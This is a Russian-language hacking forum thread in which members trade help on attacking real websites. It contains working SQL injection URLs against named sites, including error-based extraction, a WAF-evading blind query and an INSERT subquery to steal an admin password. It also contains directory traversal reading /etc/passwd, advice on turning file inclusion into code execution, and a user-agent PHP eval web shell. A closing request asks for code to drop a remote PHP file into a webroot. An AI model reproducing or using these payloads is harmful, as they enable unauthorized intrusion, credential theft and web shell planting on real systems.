Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.mamashkam.ru/users/tennisvip/blog/1'and(extractvalue(1,concat(0x3a,concat_ws(0x3a,database(),user(),version()))))and(1)='1--.html
    XPATH syntax error: ':mama:mama@localhost:5.5.25'
    UPD В chrome ошибка есть, в Firefox нет, учтите!
     
  2. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://www.cellapplications.com/product_desc.php?id=-1919'+union+select+1,2,3,4,5,6+--+
    как быть?
     
  3. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    ну, что можно раскрутить как слепую, я знаю
    а если как обычную, ни как?
     
  4. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    я имел ввиду через ерор базед :)

    опечатался, с кем не бывает)

    меня больше интересует, раскрутить как обычную...
     
    1 person likes this.
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Не сочти за трололо - но "как обычную" - это как ??

    Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ?

    Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ?

    В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ?

    З.Ы. для люителей шаблонно мыслить

    Code:
    _ttp://www.cellapplications.com/product_desc.php?id=1919'+and+substring((@@version),1,1)='5
     
    _________________________
    #21065 BigBear, 13 Sep 2012
    Last edited: 13 Sep 2012
    1 person likes this.
  6. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде?

    PHP:

    $page 
    $_GET['page'];
    $page preg_replace('/[\x80-\xFF]/''?'$page);
    $page trim(htmlspecialchars(str_replace(array("\r\n""\r""\0"), array("\n""\n"''), $page), ENT_QUOTES'UTF-8'));


    $pageClass    'Show'.ucwords($page).'Page';


    if(!
    file_exists('test/class.'.$pageClass.'.php')) {
        exit(
    'error');
    }

    // Added Autoload in feature Versions
    require('test/class.'.$pageClass.'.php');
    П.с волнует вопрос если можно обрезать то что идёт ДО переменной
     
  7. Basters

    Basters New Member

    Joined:
    23 Feb 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
     
    #21067 Basters, 14 Sep 2012
    Last edited by a moderator: 14 Sep 2012
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    а какой ты результат хочешь?
     
    _________________________
  9. Basters

    Basters New Member

    Joined:
    23 Feb 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
     
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    http://www.mysql.ru/docs/man/SELECT.html

    INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')
     
  11. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Здравствуйте нашел Directory Traversal
    http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.
     
    _________________________
  13. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    /proc/self/environ не инклудится, какие есть еще варианты?
    И Как найти логи ошибок? (напиши в личку аську)
     
    #21073 kacergei, 15 Sep 2012
    Last edited: 15 Sep 2012
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Брутом по списку наиболее распространенных вариантов.
    Если сайт на хостинге, читаешь инструкции и факи хостера или регаешь там же свой сайт, чтобы узнать стандартные имена лог-файлов.
     
    1 person likes this.
  15. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Тема for you - http://forum.antichat.ru/thread324564.html.
    Еще есть вариант с ftp логами.
     
  16. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:
    Code:
    Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: [B]28857[/B] PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000
    
    Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();
    В этот момент у меня уже стоит user-agent: <?php eval(\$_GET[cmd]); ?>

    Что делаю не так?
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    попробуй сначала вывести phpinfo() из user-agent минуя get переменную, возможно что-то напутал с PID.
     
    _________________________
  18. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    помогите докрутить блинд скулю..

    сама уязвимость

    написал скриптик (код позаимствовал из тэмпера) для версии и текучей БД:
    MS SQL 2005 и база 'InformatoreAgrario'

    терь хочу выбрать таблицы в текщей базе, но почему-то не получается =/

    havji на эту багу вообще никак не реагирует, видимо работать с OR ее не научили
     
    #21078 DeepXhadow, 20 Sep 2012
    Last edited: 20 Sep 2012
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Pangolin PRO отлично справляется с MSSQL инъекциями.

    Version = Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    User = webuser

    Database = InformatoreAgrario

    Но в твоём случае извлечению табличек мешает WAF.

    Code:
    http://www.informatoreagrario.it/clickthrough.asp?IDbanner=244%09and%09(select%09len(cast(count(1)%09as%09varchar(10)))%09from%09[informatoreagrario]..[sysobjects]%09where%09xtype=char(85)%09and%09status>0)>88%09and%091<2
    %09 в нашем случае аналог пробела
     
    _________________________
    2 people like this.
  20. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
    /var/www/htdocs/images/ ?
     
Thread Status:
Not open for further replies.